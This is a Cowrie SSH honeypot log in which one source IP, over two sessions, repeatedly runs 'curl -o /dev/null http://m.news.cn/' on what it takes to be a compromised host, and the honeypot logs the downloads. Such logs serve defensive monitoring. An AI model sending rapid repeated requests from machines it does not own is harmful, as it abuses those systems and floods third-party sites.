{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.842614Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.843411Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.868013Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.869143Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.890130Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.891189Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.893818Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.927141Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.928432Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.954236Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.955491Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.989496Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.990607Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.012859Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.023340Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.024525Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.049634Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.050815Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.088459Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.089628Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.106725Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.107744Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.113608Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.143168Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.144370Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.154981Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.156050Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.162369Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.191674Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.192746Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.203723Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.204755Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.228594Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.255222Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.256462Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.262330Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.264615Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.265584Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.298784Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.299931Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.303428Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.304685Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.349590Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.350633Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.353457Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.355365Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.397840Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.398953Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.401581Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.403319Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.439955Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.441078Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.443894Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.444913Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.503579Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.504750Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.507548Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.509176Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.545758Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.547127Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.549376Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.550421Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.561215Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.581412Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.582503Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.587587Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.588562Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.622957Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.624132Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.632237Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.633292Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.669000Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.670268Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.674962Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.676235Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.708988Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.710072Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.717966Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.719081Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.748601Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.749771Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.769977Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.771631Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.790625Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.809798Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.811236Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.815284Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.817060Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.818103Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.836660Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.849921Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.851145Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.882364Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.884685Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.925395Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.926519Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.934241Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.935406Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.975810Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.977016Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:24.985914Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:24.987026Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.012837Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.013883Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.043905Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.044975Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.067079Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.068405Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.102989Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.104323Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.121415Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.122567Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.151600Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.152923Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.167940Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.169329Z","src_ip":"212.227.125.160","session":"7541ed730449"}
